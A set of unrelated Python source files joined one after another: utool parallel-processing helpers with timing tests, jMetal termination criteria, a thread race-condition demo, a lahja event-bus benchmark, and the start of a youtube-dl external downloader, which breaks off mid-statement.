def _generate_serial2(
func, args_gen, kw_gen=None, ntasks=None, progkw={}, verbose=None, nTasks=None
):
"""internal serial generator"""
if verbose is None:
verbose = 2
if ntasks is None:
ntasks = nTasks
if ntasks is None:
ntasks = len(args_gen)
if verbose > 0:
print(
'[ut._generate_serial2] executing %d %s tasks in serial'
% (ntasks, get_funcname(func))
)
# kw_gen can be a single dict applied to everything
if kw_gen is None:
kw_gen = [{}] * ntasks
if isinstance(kw_gen, dict):
kw_gen = [kw_gen] * ntasks
# Get iterator with or without progress
if verbose > 1:
lbl = '(sergen) %s: ' % (get_funcname(func),)
progkw_ = dict(freq=None, bs=True, adjust=False, freq_est='between')
progkw_.update(progkw)
args_gen = util_progress.ProgIter(args_gen, length=ntasks, lbl=lbl, **progkw_)
for args, kw in zip(args_gen, kw_gen):
result = func(*args, **kw)
yield result
def set_num_procs(num_procs):
global __NUM_PROCS__
__NUM_PROCS__ = num_procs
def in_main_process():
"""
Returns if you are executing in a multiprocessing subprocess
Usefull to disable init print messages on windows
"""
return multiprocessing.current_process().name == 'MainProcess'
def get_sys_thread_limit():
import utool as ut
if ut.LINUX:
out, err, ret = ut.cmd('ulimit', '-u', verbose=False, quiet=True, shell=True)
else:
raise NotImplementedError('')
def get_default_numprocs():
if __NUM_PROCS__ is not None:
return __NUM_PROCS__
# if WIN32:
# num_procs = 3 # default windows to 3 processes for now
# else:
# num_procs = max(multiprocessing.cpu_count() - 2, 1)
num_procs = max(multiprocessing.cpu_count() - 1, 1)
return num_procs
def init_worker():
signal.signal(signal.SIGINT, signal.SIG_IGN)
def __testwarp(tup):
# THIS DOES NOT CAUSE A PROBLEM FOR SOME FREAKING REASON
import cv2
import numpy as np
try:
import vtool as vt
except ImportError:
import vtool as vt
img = tup[0]
M = vt.rotation_mat3x3(0.1)[0:2].dot(vt.translation_mat3x3(-10, 10))
# new = cv2.warpAffine(img, M[0:2], (500, 500), flags=cv2.INTER_LANCZOS4,
# borderMode=cv2.BORDER_CONSTANT)
# ONLY FAILS WHEN OUTPUT SIZE IS LARGE
# dsize = (314, 314) # (313, 313) does not cause the error
dsize = (500, 500) # (313, 313) does not cause the error
dst = np.empty(dsize[::-1], dtype=img.dtype)
# new = cv2.warpAffine(img, M[0:2], dsize)
print('Warping?')
new = cv2.warpAffine(img, M[0:2], dsize, dst)
print(dst is new)
return new
def _test_buffered_generator():
"""
Test for standard python calls
CommandLine:
python -m utool.util_parallel --test-_test_buffered_generator
Example:
>>> # DISABLE_DOCTEST
>>> import utool as ut
>>> from utool.util_parallel import * # NOQA
>>> from utool.util_parallel import _test_buffered_generator # NOQA
>>> _test_buffered_generator()
"""
import utool as ut
# ---- Func and Sleep Definitions
args = [346373] # 38873
func = ut.is_prime
def sleepfunc(prime=args[0]):
# time.sleep(.1)
import utool as ut
[ut.is_prime(prime) for _ in range(2)]
_test_buffered_generator_general(func, args, sleepfunc, 10.0)
def _test_buffered_generator2():
"""
CommandLine:
python -m utool.util_parallel --test-_test_buffered_generator2
Looking at about time_thresh=15s or 350 iterations to get buffered over
serial.
Test for numpy calls
Example:
>>> # DISABLE_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> _test_buffered_generator2()
"""
import numpy as np
# import utool as ut
# ---- Func and Sleep Definitions
from functools import partial
rng = np.random.RandomState(0)
args = [rng.rand(256, 256) for _ in range(32)] # 38873
func = partial(np.divide, 4.3)
def sleepfunc(prime=346373):
# time.sleep(.1)
import utool as ut
[ut.is_prime(prime) for _ in range(2)]
_test_buffered_generator_general(func, args, sleepfunc, 15.0)
def _test_buffered_generator3():
"""
CommandLine:
python -m utool.util_parallel --test-_test_buffered_generator3
This test suggests that a ut.buffered_generator is better for disk IO than
ut.generate
Example:
>>> # DISABLE_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> _test_buffered_generator3()
"""
try:
import vtool as vt
except ImportError:
import vtool as vt
import utool as ut
# ---- Func and Sleep Definitions
args = list(map(ut.grab_test_imgpath, ut.get_valid_test_imgkeys()))
func = vt.imread
def sleepfunc(prime=346373):
# time.sleep(.1)
import utool as ut
[ut.is_prime(prime) for _ in range(2)]
_test_buffered_generator_general(func, args, sleepfunc, 4.0)
def _test_buffered_generator_general(
func,
args,
sleepfunc,
target_looptime=1.0,
serial_cheat=1,
argmode=False,
buffer_size=2,
):
"""
# We are going to generate output of func in the background while sleep
# func is running in the foreground
# --- Hyperparams
target_looptime = 1.5 # maximum time to run all loops
"""
import utool as ut
# serial_cheat = 1 # approx division factor to run serial less times
show_serial = True # target_looptime < 10. # 3.0
with ut.Timer('One* call to func') as t_fgfunc:
results = [func(arg) for arg in args]
functime = t_fgfunc.ellapsed / len(args)
# sleepfunc = ut.is_prime
with ut.Timer('One* call to sleep func') as t_sleep:
if argmode:
[sleepfunc(x) for x in results]
else:
[sleepfunc() for x in results]
sleeptime = t_sleep.ellapsed / len(args)
# compute amount of loops to run
_num_loops = round(target_looptime // (functime + sleeptime))
num_data = int(_num_loops // len(args))
num_loops = int(num_data * len(args))
serial_cheat = min(serial_cheat, num_data)
data = ut.flatten([args] * num_data)
est_tsleep = sleeptime * num_loops
est_tfunc = functime * num_loops
est_needed_buffers = sleeptime / functime
print(
'Estimated stats'
+ ut.repr4(
ut.dict_subset(
locals(),
[
'num_loops',
'functime',
'sleeptime',
'est_tsleep',
'est_tfunc',
'serial_cheat',
'buffer_size',
'est_needed_buffers',
],
)
)
)
if show_serial:
with ut.Timer('serial') as t1:
# cheat for serial to make it go faster
for x in map(func, data[: len(data) // serial_cheat]):
if argmode:
sleepfunc(x)
else:
sleepfunc()
t_serial = serial_cheat * t1.ellapsed
print("...toc('adjusted_serial') = %r" % (t_serial))
with ut.Timer('ut.buffered_generator') as t2:
gen_ = ut.buffered_generator(map(func, data), buffer_size=buffer_size)
for x in gen_:
if argmode:
sleepfunc(x)
else:
sleepfunc()
with ut.Timer('ut.generate') as t3:
gen_ = ut.generate2(func, zip(data), chunksize=buffer_size, quiet=1, verbose=0)
for x in gen_:
if argmode:
sleepfunc(x)
else:
sleepfunc()
# Compare theoretical vs practical efficiency
print('\n Theoretical Results')
def parallel_efficiency(ellapsed, est_tsleep, est_tfunc):
return (1 - ((ellapsed - est_tsleep) / est_tfunc)) * 100
if show_serial:
print(
'Theoretical gain (serial) = %.3f%%'
% (parallel_efficiency(t_serial, est_tsleep, est_tfunc),)
)
print(
'Theoretical gain (ut.buffered_generator) = %.3f%%'
% (parallel_efficiency(t2.ellapsed, est_tsleep, est_tfunc),)
)
print(
'Theoretical gain (ut.generate) = %.2f%%'
% (parallel_efficiency(t3.ellapsed, est_tsleep, est_tfunc),)
)
if show_serial:
prac_tfunc = t_serial - est_tsleep
print('\n Practical Results')
print(
'Practical gain (serial) = %.3f%%'
% (parallel_efficiency(t1.ellapsed, est_tsleep, prac_tfunc),)
)
print(
'Practical gain (ut.buffered_generator) = %.3f%%'
% (parallel_efficiency(t2.ellapsed, est_tsleep, prac_tfunc),)
)
print(
'Practical gain (ut.generate) = %.2f%%'
% (parallel_efficiency(t3.ellapsed, est_tsleep, prac_tfunc),)
)
def _test_buffered_generator_general2(
bgfunc,
bgargs,
fgfunc,
target_looptime=1.0,
serial_cheat=1,
buffer_size=2,
show_serial=True,
):
"""
# We are going to generate output of bgfunc in the background while
# fgfunc is running in the foreground. fgfunc takes results of bffunc as
# args.
# --- Hyperparams
target_looptime = 1.5 # maximum time to run all loops
"""
import utool as ut
with ut.Timer('One* call to bgfunc') as t_bgfunc:
results = [bgfunc(arg) for arg in bgargs]
bgfunctime = t_bgfunc.ellapsed / len(bgargs)
# fgfunc = ut.is_prime
with ut.Timer('One* call to fgfunc') as t_fgfunc:
[fgfunc(x) for x in results]
fgfunctime = t_fgfunc.ellapsed / len(bgargs)
# compute amount of loops to run
est_looptime = bgfunctime + fgfunctime
_num_loops = round(target_looptime // est_looptime)
num_data = int(_num_loops // len(bgargs))
num_loops = int(num_data * len(bgargs))
serial_cheat = min(serial_cheat, num_data)
data = ut.flatten([bgargs] * num_data)
est_tfg = fgfunctime * num_loops
est_tbg = bgfunctime * num_loops
est_needed_buffers = fgfunctime / bgfunctime
print(
'Estimated stats'
+ ut.repr4(
ut.dict_subset(
locals(),
[
'num_loops',
'bgfunctime',
'fgfunctime',
'est_tfg',
'est_tbg',
'serial_cheat',
'buffer_size',
'est_needed_buffers',
],
)
)
)
if show_serial:
with ut.Timer('serial') as t1:
# cheat for serial to make it go faster
for x in map(bgfunc, data[: len(data) // serial_cheat]):
fgfunc(x)
t_serial = serial_cheat * t1.ellapsed
print("...toc('adjusted_serial') = %r" % (t_serial))
with ut.Timer('ut.buffered_generator') as t2:
gen_ = ut.buffered_generator(map(bgfunc, data), buffer_size=buffer_size)
for x in gen_:
fgfunc(x)
with ut.Timer('ut.generate') as t3:
gen_ = ut.generate2(bgfunc, zip(data), chunksize=buffer_size, quiet=1, verbose=0)
for x in gen_:
fgfunc(x)
# Compare theoretical vs practical efficiency
print('\n Theoretical Results')
def parallel_efficiency(ellapsed, est_tfg, est_tbg):
return (1 - ((ellapsed - est_tfg) / est_tbg)) * 100
if show_serial:
print(
'Theoretical gain (serial) = %.3f%%'
% (parallel_efficiency(t_serial, est_tfg, est_tbg),)
)
print(
'Theoretical gain (ut.buffered_generator) = %.3f%%'
% (parallel_efficiency(t2.ellapsed, est_tfg, est_tbg),)
)
print(
'Theoretical gain (ut.generate) = %.2f%%'
% (parallel_efficiency(t3.ellapsed, est_tfg, est_tbg),)
)
if show_serial:
prac_tbg = t_serial - est_tfg
print('\n Practical Results')
print(
'Practical gain (serial) = %.3f%%'
% (parallel_efficiency(t1.ellapsed, est_tfg, prac_tbg),)
)
print(
'Practical gain (ut.buffered_generator) = %.3f%%'
% (parallel_efficiency(t2.ellapsed, est_tfg, prac_tbg),)
)
print(
'Practical gain (ut.generate) = %.2f%%'
% (parallel_efficiency(t3.ellapsed, est_tfg, prac_tbg),)
)
def bgfunc(path):
# Test for /_test_buffered_generator_img
# import utool as ut
try:
import vtool as vt
except ImportError:
import vtool as vt
for _ in range(1):
img = vt.imread(path)
img = img ** 1.1
# [ut.is_prime(346373) for _ in range(2)]
return img
def _test_buffered_generator_img():
"""
Test for buffering image read calls
CONCLUSIONS:
Use buffer when bgtime is bigger, but comparable to fgtime
Use buffer when fgtime < bgtime and (fgtime + bgtime) is large
Use genrate when fgtime > bgtime and (fgtime + bgtime) is large
Use serial when fgtime is bigger and all parts are comparitively small
Buffer size should be roughly bgtime / fgtime
Buffering also has a much more even and regular cpu demand.
Also demands less cpus (I think)
CommandLine:
python -m utool.util_parallel --test-_test_buffered_generator_img
Example:
>>> # DISABLE_DOCTEST
>>> import utool as ut
>>> from utool.util_parallel import * # NOQA
>>> from utool.util_parallel import _test_buffered_generator_img # NOQA
>>> from utool.util_parallel import _test_buffered_generator_general2 # NOQA
>>> _test_buffered_generator_img()
"""
import utool as ut
args = [
ut.grab_test_imgpath(key) for key in ut.util_grabdata.get_valid_test_imgkeys()
]
# import cv2
# func = cv2.imread
# bffunc = vt.imread
def sleepfunc_bufwin(x, niters=10):
# import cv2
for z in range(niters):
# operate on image in some capacity
x.cumsum()
for z in range(2):
x ** 1.1
return x
target_looptime = 60.0
# target_looptime = 20.0
# target_looptime = 10.0
# target_looptime = 5.0
serial_cheat = 1
_test_buffered_generator_general2(
bgfunc,
args,
sleepfunc_bufwin,
target_looptime,
serial_cheat,
buffer_size=4,
show_serial=False,
)
# _test_buffered_generator_general2(bgfunc, args, sleepfunc_bufwin, target_looptime, serial_cheat, buffer_size=4, show_serial=True)
def buffered_generator(source_gen, buffer_size=2, use_multiprocessing=False):
r"""
Generator that runs a slow source generator in a separate process.
My generate function still seems faster on test cases.
However, this function is more flexible in its compatability.
Args:
source_gen (iterable): slow generator
buffer_size (int): the maximal number of items to pre-generate
(length of the buffer) (default = 2)
use_multiprocessing (bool): if False uses GIL-hindered threading
instead of multiprocessing (defualt = False).
Note:
use_multiprocessing = True seems to freeze if passed in a generator
built by six.moves.map.
References:
Taken from Sander Dieleman's data augmentation pipeline
https://github.com/benanne/kaggle-ndsb/blob/11a66cdbddee16c69514b9530a727df0ac6e136f/buffering.py
CommandLine:
python -m utool.util_parallel --test-buffered_generator:0
python -m utool.util_parallel --test-buffered_generator:1
Ignore:
>>> #functime = timeit.timeit(
>>> # 'ut.is_prime(' + str(prime) + ')', setup='import utool as ut',
>>> # number=500) / 1000.0
Example:
>>> # DISABLE_DOCTEST
>>> # UNSTABLE_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> import utool as ut
>>> num = 2 ** 14
>>> func = ut.is_prime
>>> data = [38873] * num
>>> data = list(range(num))
>>> with ut.Timer('serial') as t1:
... result1 = list(map(func, data))
>>> with ut.Timer('ut.generate2') as t3:
... result3 = list(ut.generate2(func, zip(data), chunksize=2, quiet=1, verbose=0))
>>> with ut.Timer('ut.buffered_generator') as t2:
... result2 = list(ut.buffered_generator(map(func, data)))
>>> assert len(result1) == num and len(result2) == num and len(result3) == num
>>> assert result3 == result2, 'inconsistent results'
>>> assert result1 == result2, 'inconsistent results'
Example:
>>> # DISABLE_DOCTEST
>>> # VERYSLLOOWWW_DOCTEST
>>> from utool.util_parallel import _test_buffered_generator
>>> _test_buffered_generator2()
"""
if buffer_size < 2:
raise RuntimeError('Minimal buffer_ size is 2!')
if use_multiprocessing:
print('WARNING seems to freeze if passed in a generator')
# assert False, 'dont use this buffered multiprocessing'
if False:
pool = multiprocessing.Pool(
processes=get_default_numprocs(),
initializer=init_worker,
maxtasksperchild=None,
)
Process = pool.Process
else:
Process = multiprocessing.Process
_Queue = multiprocessing.Queue
target = _buffered_generation_process
else:
_Queue = queue.Queue
Process = KillableThread
target = _buffered_generation_thread
# the effective buffer_ size is one less, because the generation process
# will generate one extra element and block until there is room in the
# buffer_.
buffer_ = _Queue(maxsize=buffer_size - 1)
# previously None was used as a sentinal, which fails when source_gen
# genrates None need to make object that it will not be generated by the
# process. A reasonable hack is to use the StopIteration exception instead
sentinal = StopIteration
process = Process(target=target, args=(iter(source_gen), buffer_, sentinal))
# if not use_multiprocessing:
process.daemon = True
process.start()
while True:
# output = buffer_.get(timeout=1.0)
output = buffer_.get()
if isinstance(output, sentinal):
return
yield output
# _iter = iter(buffer_.get, sentinal)
# for data in _iter:
# if debug:
# print('Yeidling')
# yield data
def _buffered_generation_thread(source_gen, buffer_, sentinal):
"""helper for buffered_generator"""
for data in source_gen:
buffer_.put(data, block=True)
# sentinel: signal the end of the iterator
buffer_.put(sentinal)
def _buffered_generation_process(source_gen, buffer_, sentinal):
"""helper for buffered_generator"""
for data in source_gen:
buffer_.put(data, block=True)
# sentinel: signal the end of the iterator
buffer_.put(sentinal)
# unfortunately this does not suffice as a signal: if buffer_.get() was
# called and subsequently the buffer_ is closed, it will block forever.
buffer_.close()
def spawn_background_process(func, *args, **kwargs):
"""
Run a function in the background
(like rebuilding some costly data structure)
References:
http://stackoverflow.com/questions/2046603/is-it-possible-to-run-function-in-a-subprocess-without-threading-or-writing-a-se
http://stackoverflow.com/questions/1196074/starting-a-background-process-in-python
http://stackoverflow.com/questions/15063963/python-is-thread-still-running
Args:
func (function):
CommandLine:
python -m utool.util_parallel --test-spawn_background_process
Example:
>>> # DISABLE_DOCTEST
>>> # SLOW_DOCTEST
>>> from utool.util_parallel import * # NOQA
>>> import utool as ut
>>> import time
>>> from os.path import join
>>> # build test data
>>> fname = 'test_bgfunc_output.txt'
>>> dpath = ut.get_app_resource_dir('utool')
>>> ut.ensuredir(dpath)
>>> fpath = join(dpath, fname)
>>> # ensure file is not around
>>> sleep_time = 1
>>> ut.delete(fpath)
>>> assert not ut.checkpath(fpath, verbose=True)
>>> def backgrond_func(fpath, sleep_time):
... import utool as ut
... import time
... print('[BG] Background Process has started')
... time.sleep(sleep_time)
... print('[BG] Background Process is writing')
... ut.write_to(fpath, 'background process')
... print('[BG] Background Process has finished')
... #raise AssertionError('test exception')
>>> # execute function
>>> func = backgrond_func
>>> args = (fpath, sleep_time)
>>> kwargs = {}
>>> print('[FG] Spawning process')
>>> threadid = ut.spawn_background_process(func, *args, **kwargs)
>>> assert threadid.is_alive() is True, 'thread should be active'
>>> print('[FG] Spawned process. threadid=%r' % (threadid,))
>>> # background process should not have finished yet
>>> assert not ut.checkpath(fpath, verbose=True)
>>> print('[FG] Waiting to check')
>>> time.sleep(sleep_time + .1)
>>> print('[FG] Finished waiting')
>>> # Now the file should be there
>>> assert ut.checkpath(fpath, verbose=True)
>>> assert threadid.is_alive() is False, 'process should have died'
"""
import utool as ut
func_name = ut.get_funcname(func)
name = 'mp.Progress-' + func_name
# proc_obj = multiprocessing.Process(target=func, name=name, args=args, kwargs=kwargs)
proc_obj = KillableProcess(target=func, name=name, args=args, kwargs=kwargs)
# proc_obj.daemon = True
# proc_obj.isAlive = proc_obj.is_alive
proc_obj.start()
return proc_obj
class KillableProcess(multiprocessing.Process):
"""
Simple subclass of multiprocessing.Process
Gives an additional method to kill all children
as well as itself. calls this function on delete.
DEPRICATE, do not kill processes. It is not a good idea.
It can cause deadlocks.
"""
# def __del__(self):
# self.terminate2()
# super(KillableProcess, self).__del__()
def terminate2(self):
if self.is_alive():
# print('[terminate2] Killing process')
# Kill all children
import psutil
os_proc = psutil.Process(pid=self.pid)
for child in os_proc.children():
child.terminate()
self.terminate()
else:
# print('[terminate2] Already dead')
pass
# def _process_error_wraper(queue, func, args, kwargs):
# pass
# def spawn_background_process2(func, *args, **kwargs):
# multiprocessing_queue
# import utool as ut
# func_name = ut.get_funcname(func)
# name = 'mp.Progress-' + func_name
# proc_obj = multiprocessing.Process(target=func, name=name, args=args, kwargs=kwargs)
# #proc_obj.isAlive = proc_obj.is_alive
# proc_obj.start()
def _async_raise(tid, excobj):
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(excobj))
if res == 0:
raise ValueError('nonexistent thread id')
elif res > 1:
# """if it returns a number greater than one, you're in trouble,
# and you should call it again with exc=NULL to revert the effect"""
ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, 0)
raise SystemError('PyThreadState_SetAsyncExc failed')
class KillableThread(threading.Thread):
"""
DEPRICATE, do not kill threads. It is not a good idea.
It can cause deadlocks.
References:
http://code.activestate.com/recipes/496960-thread2-killable-threads/
http://tomerfiliba.com/recipes/Thread2/
"""
def raise_exc(self, excobj):
assert self.isAlive(), 'thread must be started'
for tid, tobj in threading._active.items():
if tobj is self:
_async_raise(tid, excobj)
return
# the thread was alive when we entered the loop, but was not found
# in the dict, hence it must have been already terminated. should we raise
# an exception here? silently ignore?
def terminate(self):
# must raise the SystemExit type, instead of a SystemExit() instance
# due to a bug in PyThreadState_SetAsyncExc
try:
self.raise_exc(SystemExit)
except ValueError:
pass
def spawn_background_thread(func, *args, **kwargs):
# threadobj = IMPLEMENTATION_NUM
thread_obj = KillableThread(target=func, args=args, kwargs=kwargs)
thread_obj.start()
return thread_obj
def spawn_background_daemon_thread(func, *args, **kwargs):
# threadobj = IMPLEMENTATION_NUM
thread_obj = KillableThread(target=func, args=args, kwargs=kwargs)
thread_obj.daemon = True
thread_obj.start()
return thread_obj
if __name__ == '__main__':
"""
Ignore:
timing things
python reset_dbs.py --time-generate
python reset_dbs.py --time-generate --force-serial
python reset_dbs.py --time-generate --preinit
python reset_dbs.py --time-generate --force-serial
CommandLine:
python -m utool.util_parallel
python -m utool.util_parallel --allexamples --testslow
coverage run -m utool.util_parallel --allexamples
coverage run -m utool.util_parallel --allexamples --testslow
coverage report html -m utool/util_parallel.py
coverage html
"""
# import multiprocessing
multiprocessing.freeze_support() # for win32
import utool # NOQA
utool.doctest_funcs()
|
termination_criterion.py
|
import threading
from abc import ABC, abstractmethod
from jmetal.core.observer import Observer
from jmetal.core.quality_indicator import QualityIndicator
"""
.. module:: termination_criterion
:platform: Unix, Windows
:synopsis: Implementation of stopping conditions.
.. moduleauthor:: Antonio Benรญtez-Hidalgo <antonio.b@uma.es>
"""
class TerminationCriterion(Observer, ABC):
@abstractmethod
def update(self, *args, **kwargs):
pass
@property
@abstractmethod
def is_met(self):
pass
class StoppingByEvaluations(TerminationCriterion):
def __init__(self, max_evaluations: int):
super(StoppingByEvaluations, self).__init__()
self.max_evaluations = max_evaluations
self.evaluations = 0
def update(self, *args, **kwargs):
self.evaluations = kwargs['EVALUATIONS']
@property
def is_met(self):
return self.evaluations >= self.max_evaluations
class StoppingByTime(TerminationCriterion):
def __init__(self, max_seconds: int):
super(StoppingByTime, self).__init__()
self.max_seconds = max_seconds
self.seconds = 0.0
def update(self, *args, **kwargs):
self.seconds = kwargs['COMPUTING_TIME']
@property
def is_met(self):
return self.seconds >= self.max_seconds
def key_has_been_pressed(stopping_by_keyboard):
input('PRESS ANY KEY + ENTER: ')
stopping_by_keyboard.key_pressed = True
class StoppingByKeyboard(TerminationCriterion):
def __init__(self):
super(StoppingByKeyboard, self).__init__()
self.key_pressed = False
thread = threading.Thread(target=key_has_been_pressed, args=(self,))
thread.start()
def update(self, *args, **kwargs):
pass
@property
def is_met(self):
return self.key_pressed
class StoppingByQualityIndicator(TerminationCriterion):
def __init__(self, quality_indicator: QualityIndicator, expected_value: float, degree: float):
super(StoppingByQualityIndicator, self).__init__()
self.quality_indicator = quality_indicator
self.expected_value = expected_value
self.degree = degree
self.value = 0.0
def update(self, *args, **kwargs):
solutions = kwargs['SOLUTIONS']
if solutions:
self.value = self.quality_indicator.compute([s.objectives for s in solutions])
@property
def is_met(self):
if self.quality_indicator.is_minimization:
met = self.value * self.degree < self.expected_value
else:
met = self.value * self.degree > self.expected_value
return met
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
for a in range(0, 1000000):
i = i + 1
def decrementingFunction():
global i
for a in range(0, 1000000):
i = i - 1
def main():
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
process.py
|
from abc import ABC, abstractmethod
import itertools
import logging
import multiprocessing
import os
import signal
import time
from typing import Any, AsyncGenerator, List, NamedTuple, Optional, Tuple # noqa: F401
from lahja import BroadcastConfig, ConnectionConfig
from lahja.base import EndpointAPI
from lahja.tools.benchmark.backends import BaseBackend
from lahja.tools.benchmark.constants import (
DRIVER_ENDPOINT,
REPORTER_ENDPOINT,
ROOT_ENDPOINT,
)
from lahja.tools.benchmark.logging import setup_stderr_lahja_logging
from lahja.tools.benchmark.stats import GlobalStatistic, LocalStatistic
from lahja.tools.benchmark.typing import (
PerfMeasureEvent,
PerfMeasureRequest,
PerfMeasureResponse,
RawMeasureEntry,
ShutdownEvent,
TotalRecordedEvent,
)
from lahja.tools.benchmark.utils.reporting import print_full_report
class DriverProcessConfig(NamedTuple):
num_events: int
connected_endpoints: Tuple[ConnectionConfig, ...]
throttle: float
payload_bytes: int
backend: BaseBackend
debug_logging: bool
class BaseDriverProcess(ABC):
logger = logging.getLogger("lahja.tools.benchmark.process.DriverProcess")
def __init__(self, config: DriverProcessConfig) -> None:
self._config = config
self._process: Optional[multiprocessing.Process] = None
def start(self) -> None:
self._process = multiprocessing.Process(
target=self.launch, args=(self._config,), daemon=True
)
self._process.start()
def stop(self) -> None:
if self._process is None:
raise Exception("no process")
elif self._process.pid is not None:
os.kill(self._process.pid, signal.SIGINT)
else:
self._process.terminate()
try:
self._process.join(1)
except TimeoutError:
self._process.terminate()
self._process.join(1)
@classmethod
def launch(cls, config: DriverProcessConfig) -> None:
if config.debug_logging:
setup_stderr_lahja_logging()
try:
config.backend.run(cls.worker, config)
except KeyboardInterrupt:
return
@classmethod
async def worker(cls, config: DriverProcessConfig) -> None:
conn_config = ConnectionConfig.from_name(DRIVER_ENDPOINT)
async with config.backend.Endpoint.serve(conn_config) as event_bus:
await event_bus.connect_to_endpoints(*config.connected_endpoints)
await cls.do_driver(event_bus, config)
@staticmethod
@abstractmethod
async def do_driver(event_bus: EndpointAPI, config: DriverProcessConfig) -> None:
...
class BroadcastDriver(BaseDriverProcess):
@staticmethod
async def do_driver(event_bus: EndpointAPI, config: DriverProcessConfig) -> None:
for consumer in config.connected_endpoints:
await event_bus.wait_until_endpoint_subscribed_to(
consumer.name, PerfMeasureEvent
)
counter = itertools.count()
payload = b"\x00" * config.payload_bytes
while True:
await config.backend.sleep(config.throttle)
await event_bus.broadcast(
PerfMeasureEvent(payload, next(counter), time.time())
)
class RequestDriver(BaseDriverProcess):
@classmethod
async def do_driver(
cls, event_bus: EndpointAPI, config: DriverProcessConfig
) -> None:
for consumer in config.connected_endpoints:
await event_bus.wait_until_endpoint_subscribed_to(
consumer.name, PerfMeasureRequest
)
counter = itertools.count()
payload = b"\x00" * config.payload_bytes
while True:
await config.backend.sleep(config.throttle)
await event_bus.request(
PerfMeasureRequest(payload, next(counter), time.time())
)
class ConsumerConfig(NamedTuple):
num_events: int
backend: BaseBackend
debug_logging: bool
class BaseConsumerProcess(ABC):
logger = logging.getLogger("lahja.tools.benchmark.process.ConsumerProcess")
def __init__(self, name: str, config: ConsumerConfig) -> None:
self._name = name
self._config = config
self._process: Optional[multiprocessing.Process] = None
def start(self) -> None:
self._process = multiprocessing.Process(
target=self.launch, args=(self._name, self._config)
)
self._process.start()
@classmethod
def launch(cls, name: str, config: ConsumerConfig) -> None:
if config.debug_logging:
setup_stderr_lahja_logging()
config.backend.run(cls.worker, name, config)
@classmethod
async def worker(cls, name: str, config: ConsumerConfig) -> None:
conn_config = ConnectionConfig.from_name(name)
async with config.backend.Endpoint.serve(conn_config) as event_bus:
await event_bus.connect_to_endpoints(
ConnectionConfig.from_name(REPORTER_ENDPOINT)
)
await event_bus.wait_until_connected_to(DRIVER_ENDPOINT)
stats = await cls.do_consumer(event_bus, config)
await event_bus.wait_until_endpoint_subscribed_to(
REPORTER_ENDPOINT, TotalRecordedEvent
)
await event_bus.broadcast(
TotalRecordedEvent(stats.crunch(event_bus.name)),
BroadcastConfig(filter_endpoint=REPORTER_ENDPOINT),
)
@staticmethod
@abstractmethod
async def do_consumer(
event_bus: EndpointAPI, config: ConsumerConfig
) -> LocalStatistic:
...
class BroadcastConsumer(BaseConsumerProcess):
@staticmethod
async def do_consumer(
event_bus: EndpointAPI, config: ConsumerConfig
) -> LocalStatistic:
stats = LocalStatistic()
events = event_bus.stream(PerfMeasureEvent, num_events=config.num_events)
async for event in events:
stats.add(RawMeasureEntry(sent_at=event.sent_at, received_at=time.time()))
return stats
class RequestConsumer(BaseConsumerProcess):
@staticmethod
async def do_consumer(
event_bus: EndpointAPI, config: ConsumerConfig
) -> LocalStatistic:
stats = LocalStatistic()
events = event_bus.stream(PerfMeasureRequest, num_events=config.num_events)
async for event in events:
await event_bus.broadcast(PerfMeasureResponse(), event.broadcast_config())
stats.add(RawMeasureEntry(sent_at=event.sent_at, received_at=time.time()))
return stats
class ReportingProcessConfig(NamedTuple):
num_processes: int
num_events: int
throttle: float
payload_bytes: int
backend: BaseBackend
debug_logging: bool
class ReportingProcess:
logger = logging.getLogger("lahja.tools.benchmark.process.ReportingProcess")
def __init__(self, config: ReportingProcessConfig) -> None:
self._name = REPORTER_ENDPOINT
self._config = config
self._process: Optional[multiprocessing.Process] = None
def start(self) -> None:
self._process = multiprocessing.Process(
target=self.launch, args=(self._config,)
)
self._process.start()
@classmethod
def launch(cls, config: ReportingProcessConfig) -> None:
if config.debug_logging:
setup_stderr_lahja_logging()
logging.basicConfig(level=logging.INFO, format="%(message)s")
logger = logging.getLogger("reporting")
config.backend.run(ReportingProcess.worker, logger, config)
@staticmethod
async def worker(logger: logging.Logger, config: ReportingProcessConfig) -> None:
conn_config = ConnectionConfig.from_name(REPORTER_ENDPOINT)
async with config.backend.Endpoint.serve(conn_config) as event_bus:
await event_bus.connect_to_endpoints(
ConnectionConfig.from_name(ROOT_ENDPOINT)
)
global_statistic = GlobalStatistic()
events = event_bus.stream(
TotalRecordedEvent, num_events=config.num_processes
)
async for event in events:
global_statistic.add(event.total)
print_full_report(
logger,
config.backend,
config.num_processes,
config.num_events,
global_statistic,
)
await event_bus.broadcast(
ShutdownEvent(), BroadcastConfig(filter_endpoint=ROOT_ENDPOINT)
)
|
external.py
|
from __future__ import unicode_literals
import os.path
import re
import subprocess
import sys
import time
import websocket
from threading import Thread
from docs.conf import templates_path
from .common import FileDownloader
from ..compat import (
compat_setenv,
compat_str,
)
from ..postprocessor.ffmpeg import FFmpegPostProcessor, EXT_TO_OUT_FORMATS
from ..utils import (
cli_option,
cli_valueless_option,
cli_bool_option,
cli_configuration_args,
encodeFilename,
encodeArgument,
handle_youtubedl_headers,
check_executable,
is_outdated_version,
)
class ExternalFD(FileDownloader):
def real_download(self, filename, info_dict):
self.report_destination(filename)
tmpfilename = self.temp_name(filename)
try:
started = time.time()
retval = self._call_downloader(tmpfilename, info_dict)
except KeyboardInterrupt:
if not info_dict.get('is_live'):
raise
# Live stream downloading cancellation should be considered as
# correct and expected termination thus all postprocessing
# should take place
retval = 0
self.to_screen('[%s] Interrupted by user' % self.get_basename())
if retval == 0:
status = {
'filename': filename,
'status': 'finished',
'elapsed': time.time() - started,
}
if filename != '-':
fsize = os.path.getsize(encodeFilename(tmpfilename))
self.to_screen('\r[%s] Downloaded %s bytes' % (self.get_basename(), fsize))
self.try_rename(tmpfilename, filename)
status.update({
'downloaded_bytes': fsize,
'total_bytes': fsize,
})
self._hook_progress(status)
return True
else:
self.to_stderr('\n')
self.report_error('%s exited with code %d' % (
